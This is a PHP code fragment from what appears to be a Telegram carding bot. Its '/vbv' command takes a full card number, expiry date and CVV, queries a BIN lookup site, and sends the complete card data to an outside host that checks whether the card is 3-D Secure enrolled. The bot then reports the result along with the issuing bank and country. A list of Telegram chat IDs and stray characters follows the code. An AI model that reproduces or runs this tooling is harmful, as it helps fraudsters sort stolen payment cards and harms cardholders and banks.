*/ */ if (strpos($text, "/vbv") === 0 || strpos($text, "!vbv") === 0 || strpos($text, ".vbv") === 0) { $messageidtoedit4 = bot('sendmessage', [ 'chat_id' => $chat_id, 'text' => "Processing Your Request...", 'parse_mode' => 'html', 'reply_to_message_id' => $message_id, ]); $messageidtopfw = $messageidtoedit4['result']['message_id'] ?? null; $lista = substr($text, 5); $lista = clean($lista); $parts = multiexplode(["|", ":", "/", " ", ""], $lista); if (count($parts) < 4) { bot('editMessageText', [ 'chat_id' => $chat_id, 'message_id' => $messageidtopfw, 'text' => "❌ 格式錯誤,請輸入: `卡號|月|年|CVV`", 'parse_mode' => 'Markdown' ]); return; } [$cc, $mes, $ano, $cvv] = $parts; $lista = "$cc|$mes|$ano|$cvv"; $fim = json_decode(file_get_contents('https://bins.antipublic.cc/bins/'.$cc), true); $bin1 = $fim["bin"] ?? null; $brand = $fim["brand"] ?? "N/A"; $type = $fim["type"] ?? "N/A"; $bank = $fim["bank"] ?? "N/A"; $country_name = $fim["country_name"] ?? "N/A"; $country_flag = $fim["country_flag"] ?? ""; // 查詢 3DS $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://linksnow.tech/b3/vbv.php?lista=$lista"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($ch); curl_close($ch); $r1 = json_decode($result, 1); if (!$r1 || !isset($r1["Status"])) { bot('editMessageText', [ 'chat_id' => $chat_id, 'message_id' => $messageidtopfw, 'text' => "❌ 無法取得查詢結果,API 可能無回應。", 'parse_mode' => 'html' ]); return; } $Status = $r1["Status"]; $Took = $r1["Took"]; $response = $r1["Response"]; bot('editMessageText', [ 'chat_id' => $chat_id, 'message_id' => $messageidtopfw, 'text' => "3Ds Lookup Card: $cc|$mes|$ano|$cvv Status: $Status Message: $response Bin: $bin1 Bin Info: $brand - $type Bank: $bank Country: $country_name $country_flag Time: $Took Seconds", 'reply_to_message_id' => $message_id, 'parse_mode' => 'html' ]); } -1001892921440 -1001565148429 -1001904923488 -1001861270058 -1001980488970 -1001952669250 -1001371716157|||||||||19326327481932632748